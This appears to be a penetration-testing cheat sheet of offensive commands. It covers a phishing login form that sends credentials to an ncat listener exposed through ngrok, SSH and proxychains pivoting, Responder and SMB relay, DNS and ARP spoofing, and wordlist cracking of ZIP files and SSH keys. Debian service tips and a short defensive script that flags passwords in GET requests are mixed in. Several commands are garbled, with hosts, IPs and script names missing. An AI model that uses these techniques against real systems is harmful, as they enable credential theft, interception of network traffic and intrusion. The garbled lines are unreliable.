Harvest credentials

Start netcat listener

ncat -lvp 4444

Start ngrok to make the URL accessible

./ngrok http 4444

Send page to users:

<b>Login required</b><br><br><b>ENTER Credentials:<br><br><form action=”; method=”GET”><input type=”text” name=”email” placeholder=”Your Username”><br><input type=”password” name=”password”><br><input type=”submit” value=”Submit”></form>
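The form above submits with method GET, so the email and password fields travel in the query string and are written to every proxy and web-server log on the path. A detection sketch for that pattern, added here as an example and not part of the original page; the combined log format, the parameter-name list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameter names that suggest a credential was submitted (assumed list).
CREDENTIAL_PARAMS = {"password", "passwd", "pwd", "pass"}

# Minimal pattern for the request part of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def find_credential_gets(log_lines):
    """Return (line_number, path, param_names) for GET requests carrying a password."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match or match.group("method") != "GET":
            continue
        target = urlsplit(match.group("target"))
        params = parse_qs(target.query, keep_blank_values=True)
        leaked = sorted(n for n in params if n.lower() in CREDENTIAL_PARAMS)
        if leaked:
            # Report only the parameter names; never copy the secret into the alert.
            hits.append((number, target.path, leaked))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /?email=alice%40example.com&password=Example123 HTTP/1.1" 200 0',
    '10.0.0.8 - - [01/Jan/2024:10:00:09 +0000] "POST /login HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /search?q=password+policy HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, path, names in find_credential_gets(SAMPLE_LOG):
        print(f"line {number}: GET {path} carries credential parameters {names}")
```

The check matches on parameter names, not values, so a search for the word "password" (last sample line) is not flagged.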



Port Forwarding

Listen on local port 9999 and forward traffic to the target's RDP service through an SSH tunnel on the exploited host

ssh -L 9999: msx@

Use proxychains to route traffic through the exploited host

ssh -D msx@

Usage example: nmap scan

proxychains nmap -sT -v

Debian Tips

How to list all services in Debian

To view all the services in Debian 10, run the following command.

ls /etc/init.d

If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.

systemctl list-unit-files

How to check the status of a particular service using init.d

There are several ways to check whether a particular service is running. One such method uses init.d. Run the command with root privileges, using the following syntax:

/etc/init.d/{servicename} status

Let’s check the status of the networking service. The complete command should look like the following,

/etc/init.d/networking status

How to stop, start and restart a particular service

There are two methods of stopping and starting a particular service. I will list here both of the methods.

Start and stop a service using init.d

Let me start by stopping the already running networking service to show you how to stop any service with the help of init.d. Execute the following command with root privileges,

/etc/init.d/networking stop

Print route

route -n

Responder & SMB Relay

1. Run -i<target IP> against target

2. Modify the Responder.conf configuration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.

3. python -I eth0 --lm

4. python -t <target IP> -u ALL


SMB Relay:

use windows/smb/smb_relay

set target SMBHOST

Configure DNS spoof record

echo " *" > dns

Run DNS spoof

dnsspoof -i tap0 -f dns

Run ARP MITM

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i tap0 -t
arpspoof -i tap0 -t

ZIP crack

fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt

Windows Tricks

net time -S IP -U ""

date -s time

rdate -n ip

tcpdump -i tun0 icmp (for protocol filter)

Inspect an image for embedded content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png

Use SSH private key


chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ id_rsa > test

john --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test